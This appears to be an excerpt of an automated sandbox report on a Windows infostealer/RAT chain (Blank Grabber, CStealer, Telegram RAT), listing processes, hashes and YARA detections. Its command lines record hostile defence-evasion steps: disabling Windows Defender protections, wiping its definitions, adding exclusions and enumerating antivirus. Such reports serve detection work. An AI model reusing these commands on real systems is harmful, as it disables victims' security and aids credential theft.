                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                          Imagebase:0x7ff61a5b0000
                                                                                                                                                          File size:25'152'315 bytes
                                                                                                                                                          MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 46%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                          Imagebase:0x7ff704090000
                                                                                                                                                          File size:7'242'457 bytes
                                                                                                                                                          MD5 hash:A71FC3CA1BD1AF148EE4C1BFABCBE0DA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000012.00000003.2244326949.00000177139C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000012.00000003.2244326949.00000177139C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 47%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:17:47:19
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                          Imagebase:0x7ff704090000
                                                                                                                                                          File size:7'242'457 bytes
                                                                                                                                                          MD5 hash:A71FC3CA1BD1AF148EE4C1BFABCBE0DA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000013.00000003.2290157848.0000020710C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:17:47:21
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2292462578.0000025416446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2289697858.0000025416446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2285580339.0000025416469000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:17:47:22
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                          Imagebase:0x7ff61a5b0000
                                                                                                                                                          File size:25'152'315 bytes
                                                                                                                                                          MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:17:47:22
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:17:47:23
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:17:47:23
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                          File size:19'846'974 bytes
                                                                                                                                                          MD5 hash:8198AD352AB70C2C974AB5C716956CD7
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:28
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:30
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:31
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:32
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:33
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                                                                                                                                          Imagebase:0x7ff6a7080000
                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:34
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:35
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:36
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:37
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:38
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:39
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:40
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:41
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:42
                                                                                                                                                          Start time:17:47:27
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:43
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:44
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:45
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:46
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\main.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\main.exe"
                                                                                                                                                          Imagebase:0x16132c30000
                                                                                                                                                          File size:5'872'344 bytes
                                                                                                                                                          MD5 hash:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002E.00000002.2512314562.0000016135011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 66%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:47
                                                                                                                                                          Start time:17:47:30
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:48
                                                                                                                                                          Start time:17:47:30
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:49
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:50
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                          Imagebase:0x7ff667680000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
